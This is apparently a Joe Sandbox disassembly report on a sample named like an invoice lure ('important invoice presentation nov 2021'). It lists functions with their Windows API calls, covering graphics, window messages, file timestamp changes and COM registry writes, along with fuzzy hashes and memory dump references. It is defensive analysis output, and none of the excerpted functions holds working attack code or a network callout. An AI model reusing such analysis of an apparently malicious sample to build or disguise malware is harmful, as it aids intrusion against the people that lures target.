SelectPalette.GDI32(00000000,?,00000000), ref: 00C04874
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00C048C8
GlobalReAlloc.KERNEL32 ref: 00C04911
GetDIBits.GDI32(00000000,?,00000000,?,?,00000000,00000000), ref: 00C0493A
GlobalFree.KERNEL32 ref: 00C04945
SelectPalette.GDI32(00000000,?,00000000), ref: 00C0497F
SelectObject.GDI32(00000000,00000003), ref: 00C0498E
DeleteObject.GDI32(?), ref: 00C04997
DeleteDC.GDI32(00000000), ref: 00C0499E
GlobalFree.KERNEL32 ref: 00C049A9
SelectPalette.GDI32(00000000,?,00000000), ref: 00C049B5
SelectObject.GDI32(00000000,00000003), ref: 00C049C4
DeleteObject.GDI32(?), ref: 00C049CD
DeleteDC.GDI32(00000000), ref: 00C049D4

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ObjectSelect$Palette$DeleteGlobal$AllocBitsCreateFree$BitmapCompatibleRealizeStock
String ID:
API String ID: 376747870-0
Opcode ID: f80d69422ed6346e01879b3cb99037ff33d552fe5a2a56d986114321023169cd
Instruction ID: 9990c75d78537fa4c949af400ef3420a64fd7ab3b5377711a926e49a856c6d68
Opcode Fuzzy Hash: f80d69422ed6346e01879b3cb99037ff33d552fe5a2a56d986114321023169cd
Instruction Fuzzy Hash: DA71F6B6900319EFDB14DFA8DC49AAEBBB9FF48701F104625F915E7290D7349A50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C311DD, Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 397windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C311E4
GetParent.USER32(?), ref: 00C312A3
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00C312C8
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00C31336
BringWindowToTop.USER32(?), ref: 00C3135C
GetParent.USER32(?), ref: 00C313EA
GetParent.USER32(?), ref: 00C31478
RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 00C31498
InvalidateRect.USER32(?,00000000,00000001), ref: 00C314DA
UpdateWindow.USER32(?), ref: 00C314E3
GetSystemMenu.USER32(?,00000000), ref: 00C31547
GetMenuItemInfoA.USER32 ref: 00C31588
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00C315E0
GetWindowRect.USER32 ref: 00C31603
GetParent.USER32(?), ref: 00C3160C
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 00C31639

Part of subcall function 00C2CA60: GetParent.USER32(?), ref: 00C2CAC1
Part of subcall function 00C2CA60: SendMessageA.USER32(?,00000222,?,00000000), ref: 00C2CADA

Strings

0, xrefs: 00C3156E

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ParentWindow$MessageSend$MenuRectRedraw$BringH_prolog3_InfoInvalidateItemSystemUpdate
String ID: 0
API String ID: 1054027295-4108050209
Opcode ID: d3dd2b791b14c30d7f794c9a835976af45b362f1868462e89cac93b979324aa2
Instruction ID: e97fadca9dfc361b6a20a7bed952b478947679cfd54f5f2c6c8b7501db2fe583
Opcode Fuzzy Hash: d3dd2b791b14c30d7f794c9a835976af45b362f1868462e89cac93b979324aa2
Instruction Fuzzy Hash: CAE18D31710712EFDB159B64CC89BFDBBB5BF48310F180269E826A72A1DF71A901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8582, Relevance: 28.7, APIs: 19, Instructions: 240windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BC8589
CreateRectRgnIndirect.GDI32(?), ref: 00BC85C3
CopyRect.USER32 ref: 00BC85D7
InflateRect.USER32(?,?,?), ref: 00BC85ED
IntersectRect.USER32 ref: 00BC85F9
CreateRectRgnIndirect.GDI32(?), ref: 00BC8603
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BC8618
CombineRgn.GDI32(?,?,?,00000003), ref: 00BC8632
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BC867D
SetRectRgn.GDI32(?,?,00000004,?,?), ref: 00BC869A
CopyRect.USER32 ref: 00BC86A5
InflateRect.USER32(?,?,?), ref: 00BC86BB
IntersectRect.USER32 ref: 00BC86C7
SetRectRgn.GDI32(?,?,?,?,?), ref: 00BC86DC
CombineRgn.GDI32(?,?,?,00000003), ref: 00BC86ED
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BC8704
CombineRgn.GDI32(?,?,?,00000003), ref: 00BC871E

Part of subcall function 00BC88F6: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00BC893D
Part of subcall function 00BC88F6: CreatePatternBrush.GDI32(00000000), ref: 00BC894A
Part of subcall function 00BC88F6: DeleteObject.GDI32(00000000), ref: 00BC8956

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 00BC877B

Part of subcall function 00BB455B: SelectObject.GDI32(?,00000000), ref: 00BB457B
Part of subcall function 00BB455B: SelectObject.GDI32(?,00000000), ref: 00BB4591

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 00BC87DB

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$Create$CombineObject$CopyIndirectInflateIntersectSelect$BitmapBrushDeleteH_prolog3_Pattern
String ID:
API String ID: 3480991079-0
Opcode ID: 6924a106febb0d32410f5308cc0c18e6edcffc5f3f0795259adcbda6338175cd
Instruction ID: 401f95b920975d336d6560db33a23b3ef2c8f843794aa8cf6c8cb53810c19e31
Opcode Fuzzy Hash: 6924a106febb0d32410f5308cc0c18e6edcffc5f3f0795259adcbda6338175cd
Instruction Fuzzy Hash: DF91AFB1900218EFDF05DFA4DD99DEEBBB9FF08300B144669F916A3251DB74A9058B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B9E820, Relevance: 28.5, APIs: 14, Strings: 2, Instructions: 460windowCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B9E8B2
__fassign.LIBCMT ref: 00B9E959
SysFreeString.OLEAUT32(?), ref: 00B9E969
SysFreeString.OLEAUT32(?), ref: 00B9EA28

Part of subcall function 00B9DFA0: WideCharToMultiByte.KERNEL32(00000003,00000000,00BA787A,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,?,00BA787A,?), ref: 00B9DFBE
Part of subcall function 00B9DFA0: WideCharToMultiByte.KERNEL32(00000003,00000000,00BA787A,000000FF,00000014,-00000001,00000000,00000000,?,00BA787A,?), ref: 00B9DFF4

__fassign.LIBCMT ref: 00B9EAB3
SysFreeString.OLEAUT32(?), ref: 00B9EAC3
SysFreeString.OLEAUT32(?), ref: 00B9EB24
VariantClear.OLEAUT32(?), ref: 00B9EB4A
VariantClear.OLEAUT32(?), ref: 00B9EBB5
SendMessageA.USER32(?,00000143,00000000,?), ref: 00B9EC7D
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00B9EC94
SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00B9ECD7
SendMessageA.USER32(?,00000143,00000000,?), ref: 00B9ED0F
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00B9ED22

Strings

Group, xrefs: 00B9E953
User, xrefs: 00B9EAAD

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$FreeString$Variant$ByteCharClearMultiWide__fassign$Init
String ID: Group$User
API String ID: 265438647-3315920905
Opcode ID: 35ddfbecb63af3d9baf7f007504145fd708a64e9464268e1a9ab0b0c689f6310
Instruction ID: 895dae47e8e397c23f84122007ddabdb91e55177d3204aed80bdb6e5adcb2773
Opcode Fuzzy Hash: 35ddfbecb63af3d9baf7f007504145fd708a64e9464268e1a9ab0b0c689f6310
Instruction Fuzzy Hash: 59F17E71A01219AFDF10DFA4C885FAEBBF4EF44714F0446A8E815AB2A1DB71DD05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C02637, Relevance: 25.9, APIs: 17, Instructions: 403windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C02641
GetObjectA.GDI32(?,00000054,?), ref: 00C026D6
CreateCompatibleDC.GDI32(00000000), ref: 00C02869
GetObjectA.GDI32(?,00000018,?), ref: 00C0288A
SelectObject.GDI32(?,?), ref: 00C028AD
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C028D7
SelectObject.GDI32(?,00000000), ref: 00C028F0
CreateCompatibleDC.GDI32(?), ref: 00C02910
SelectObject.GDI32(?,00000000), ref: 00C02929
SelectObject.GDI32(?,00000000), ref: 00C02940
DeleteObject.GDI32(00000000), ref: 00C02947
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,Function_00130020), ref: 00C0296F
GetPixel.GDI32(?,00000000,00000000), ref: 00C029BB
SetPixel.GDI32(?,00000000,00000000,00000000), ref: 00C02AD1
SelectObject.GDI32(?,?), ref: 00C02B0A
SelectObject.GDI32(?,00000000), ref: 00C02B17
DeleteObject.GDI32(?), ref: 00C02B23

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3_
String ID:
API String ID: 1136552931-0
Opcode ID: 214937f2b980e0cd8398812fec5632fd4a540a35f6bafc408942da477904c62a
Instruction ID: e0b9fc6e1b6fd33816224a1996673f814b77c4adf9689e70a7f2baa6fde027fb
Opcode Fuzzy Hash: 214937f2b980e0cd8398812fec5632fd4a540a35f6bafc408942da477904c62a
Instruction Fuzzy Hash: 68E1B272E00219EBDB266F50CD49BDDBB78FF01740F2086D5A586B21E5EA314E95CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2A74, Relevance: 25.8, APIs: 17, Instructions: 251windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BB2A7B
CreateCompatibleDC.GDI32(00000000), ref: 00BB2AD9
CreateCompatibleDC.GDI32(00000000), ref: 00BB2AFA
GetObjectA.GDI32(00000003,00000018,?), ref: 00BB2B1A
CreateBitmap.GDI32(00000008,00000008,00000001,00000001,00DC4EF4), ref: 00BB2B35
CreatePatternBrush.GDI32(?), ref: 00BB2B47
DeleteObject.GDI32(?), ref: 00BB2B78
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00BB2B8A
GetPixel.GDI32(?,00000000,00000000), ref: 00BB2BCE
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,Function_00130020), ref: 00BB2BF4
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 00BB2C1C

Part of subcall function 00BB4646: SetBkColor.GDI32(?,?), ref: 00BB465B
Part of subcall function 00BB4646: SetBkColor.GDI32(?,?), ref: 00BB466D

FillRect.USER32 ref: 00BB2C80
BitBlt.GDI32(00000003,?,?,?,?,?,00000000,00000000,00660046), ref: 00BB2CCA
BitBlt.GDI32(00000003,?,?,?,?,?,00000000,00000000,008800C6), ref: 00BB2CE7
BitBlt.GDI32(00000003,?,?,?,?,?,00000000,00000000,00660046), ref: 00BB2D04

Part of subcall function 00BB44E2: SelectObject.GDI32(?,00C3F98C), ref: 00BB44EB

DeleteDC.GDI32(00000000), ref: 00BB2D5F
DeleteDC.GDI32(00000000), ref: 00BB2D7E

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Create$DeleteObject$BitmapColorCompatible$BrushFillH_prolog3_PatternPixelRectSelect
String ID:
API String ID: 1357163565-0
Opcode ID: 7c2e8b5ad851d0c8a62a6a779dd21204ec4eac07b11e1d2afd26aca4657cc96a
Instruction ID: 5667e49d4cfd621a653c64037ede414c0f2d20b950ecfa6e6a77fb766a9dfaec
Opcode Fuzzy Hash: 7c2e8b5ad851d0c8a62a6a779dd21204ec4eac07b11e1d2afd26aca4657cc96a
Instruction Fuzzy Hash: EEA1C071900218EFDF219FA4CD85AEEBBBAFF08700F144159F901A72A1DBB19D15DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BFCFB2, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BFCFB9
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00BFD00A
ClientToScreen.USER32(?,0000004E), ref: 00BFD03F
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00BFD0A6
SHGetDesktopFolder.SHELL32(?), ref: 00BFD0CF
GetParent.USER32(?), ref: 00BFD0FD
CreatePopupMenu.USER32 ref: 00BFD14D

Strings

$, xrefs: 00BFD22A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$ClientCreateDesktopFolderH_prolog3_MenuParentPopupScreen
String ID: $
API String ID: 2088741424-3993045852
Opcode ID: 92b74af56a51951f20e3eca22418f8519c8ea994e7d262d5ea557cc8838d8790
Instruction ID: 9cea49d3e6a567cf03895f64826a2712dd29e47d0da9b831d97a6dfff33f9f5c
Opcode Fuzzy Hash: 92b74af56a51951f20e3eca22418f8519c8ea994e7d262d5ea557cc8838d8790
Instruction Fuzzy Hash: 71A13875A00219DFDF14DFA4D844AEEBBF5EF08710F1041AAEA05EB2A0DB719D45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE2DC3, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 166filetimeCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?), ref: 00BE2E08
GetLastError.KERNEL32(?), ref: 00BE2E16
SetFileAttributesA.KERNEL32(?,?), ref: 00BE2E40
GetLastError.KERNEL32(?), ref: 00BE2E4B
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00BE2ECF
GetLastError.KERNEL32(?), ref: 00BE2EDE
SetFileTime.KERNEL32(00000000,?,?,?), ref: 00BE2EF8
GetLastError.KERNEL32 ref: 00BE2F02
CloseHandle.KERNEL32(?), ref: 00BE2F0D

Part of subcall function 00BE2689: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,00BE2BC5,?,00000000,?,?), ref: 00BE26A0
Part of subcall function 00BE2689: GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedA), ref: 00BE26B0

CloseHandle.KERNEL32(?), ref: 00BE2F20
GetLastError.KERNEL32(?), ref: 00BE2F2B
SetFileAttributesA.KERNEL32(?,?), ref: 00BE2F55
GetLastError.KERNEL32(?), ref: 00BE2F60

Strings

@Mxt, xrefs: 00BE2E16, 00BE2E4B, 00BE2EDE, 00BE2F02, 00BE2F2B, 00BE2F60

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorLast$File$AttributesHandle$Close$AddressCreateModuleProcTime
String ID: @Mxt
API String ID: 3934836844-1922883433
Opcode ID: fb71d509f1fbf5f4070c2cc58a44de2a47a432f393ee45069d4f2153557fedce
Instruction ID: 2b41a7db9fb91cfc41ac2978673ed91585fb7dbd33e6de6cf422003dcf860068
Opcode Fuzzy Hash: fb71d509f1fbf5f4070c2cc58a44de2a47a432f393ee45069d4f2153557fedce
Instruction Fuzzy Hash: 26515971A00258EFCB14EFA5DD89EAEB7FCFF08700B144299F916E7250DB34A9018B61

Uniqueness

Uniqueness Score: -1.00%

Function 00BD6D3E, Relevance: 24.2, APIs: 16, Instructions: 176windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32 ref: 00BD6DD1
SendMessageA.USER32(00000000,00000084,00000000,?), ref: 00BD6DEF
ReleaseCapture.USER32(?,?,?,?,?,00BD6B0C,?), ref: 00BD6E2A
GetMessageA.USER32 ref: 00BD6E3A
PeekMessageA.USER32 ref: 00BD6E4C
DispatchMessageA.USER32 ref: 00BD6E53
DispatchMessageA.USER32 ref: 00BD6F0A
GetCursorPos.USER32(00000000,?,?,?,?,?,00BD6B0C,?), ref: 00BD6F14
PeekMessageA.USER32 ref: 00BD6F35

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
String ID:
API String ID: 597789953-0
Opcode ID: 76902fd8ac8161c6bf7e0adee8c6d2daee16f869a05796183cbb6166fa062477
Instruction ID: eb9910291ab60f6d1d4e8a559200ff74c2b29436e4ddcdaa5d458dffbbd0b4ee
Opcode Fuzzy Hash: 76902fd8ac8161c6bf7e0adee8c6d2daee16f869a05796183cbb6166fa062477
Instruction Fuzzy Hash: C851C074600601FBEF255B50DC89FBDFBBAEB44700F1042AAF102D63A0EB74A894DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C06DD2, Relevance: 24.2, APIs: 16, Instructions: 155windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C06DD9
CreateCompatibleDC.GDI32(00000000), ref: 00C06E07
GetObjectA.GDI32(00000000,00000018,?), ref: 00C06E20
SelectObject.GDI32(00BD948E,00000000), ref: 00C06E3C
CreateCompatibleBitmap.GDI32(00BD948E,?,00C3C55F), ref: 00C06E5D
SelectObject.GDI32(00BD948E,00000000), ref: 00C06E6E
CreateCompatibleDC.GDI32(00BD948E), ref: 00C06E88
SelectObject.GDI32(?,?), ref: 00C06E9D
SelectObject.GDI32(00BD948E,00000000), ref: 00C06EAE
DeleteObject.GDI32(?), ref: 00C06EB7
BitBlt.GDI32(?,00000000,00000000,000000FF,?,00BD948E,00000000,00000000,Function_00130020), ref: 00C06ED7
GetPixel.GDI32(?,?,00000000), ref: 00C06EFD
SetPixel.GDI32(?,?,00000000,00000000), ref: 00C06F44
SelectObject.GDI32(?,00000000), ref: 00C06F6B
SelectObject.GDI32(00BD948E,00000000), ref: 00C06F75
DeleteObject.GDI32(00000000), ref: 00C06F7D

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3
String ID:
API String ID: 3639146769-0
Opcode ID: f1e684e65a51968e4d583bdeeb87795e61203b3aa74aa3c82e86af583ff5c64a
Instruction ID: 46700bb59c9a56cf482636d398a358eea9efb088913a5d58fae74ddd7bf73af1
Opcode Fuzzy Hash: f1e684e65a51968e4d583bdeeb87795e61203b3aa74aa3c82e86af583ff5c64a
Instruction Fuzzy Hash: 7651293191022AEFDF159FE4DC48AEEBB79FF08351F100125F521A22A0DB719E61DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C531DA, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 287COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C531E1
EqualRect.USER32 ref: 00C5320B
MonitorFromPoint.USER32(?,00000000,00000002), ref: 00C5338A
GetMonitorInfoA.USER32 ref: 00C53391

Part of subcall function 00BB455B: SelectObject.GDI32(?,00000000), ref: 00BB457B
Part of subcall function 00BB455B: SelectObject.GDI32(?,00000000), ref: 00BB4591

Part of subcall function 00BB54B7: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00BB54CC

CopyRect.USER32 ref: 00C533A3
SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 00C533B5
InvalidateRect.USER32(00000000,00000000,00000001,00000004,00E47C68,?,?,?,00BFBCEA,00000210), ref: 00C53461
UpdateWindow.USER32(00000000), ref: 00C5346A
LoadCursorA.USER32 ref: 00C5347C
SetCursor.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C53483
__EH_prolog3.LIBCMT ref: 00C534A6

Strings

Workspace, xrefs: 00C53510
(, xrefs: 00C5336F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$CursorInfoMonitorObjectSelect$CopyEqualExtentFromH_prolog3H_prolog3_InvalidateLoadParametersPointPoint32SystemTextUpdateWindow
String ID: ($Workspace
API String ID: 1249011538-4160940736
Opcode ID: 57e4a87cad00e465acfe5c03d535841bc451829d4eb2ed38176442c76a54b48b
Instruction ID: 26587d9d675787b67fc87119d8c96455761b4013c8194f6b1d6fa9bcc9b372b1
Opcode Fuzzy Hash: 57e4a87cad00e465acfe5c03d535841bc451829d4eb2ed38176442c76a54b48b
Instruction Fuzzy Hash: 29C17F75A0025ADFCF04DFA8C945BEDBBB5FF44300F148169E819AB251DB70AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BDEEA8, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 123registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,Insertable,00000000,00000000,0002001F,00000000,00000000,00000000,?,?,?,?,00000000,00000000,0002001F), ref: 00BDEF15
RegCloseKey.ADVAPI32(00000000,00000000,Insertable,00000000,00000000,0002001F,00000000,00000000,00000000,?,?), ref: 00BDEF24

Part of subcall function 00BC3EC5: RegCreateKeyExA.ADVAPI32(?,?,00000000,80070057,?,000000FF,00DA95B9,80070057,?,4B5C1563,?,?,?,?,00000000,00DA95B9), ref: 00BC3F1C

RegOpenKeyExW.ADVAPI32(0002001F,InprocServer32,00000000,00020006,00000000,00000000,?,?,?,?,00000000,00000000,0002001F,00000000,00000000), ref: 00BDEF77
_strlen.LIBCMT ref: 00BDEF89
RegSetValueExA.ADVAPI32(00000001,ThreadingModel,00000000,00000001,?,00000001), ref: 00BDEF9E
RegCloseKey.ADVAPI32(?), ref: 00BDEFAC
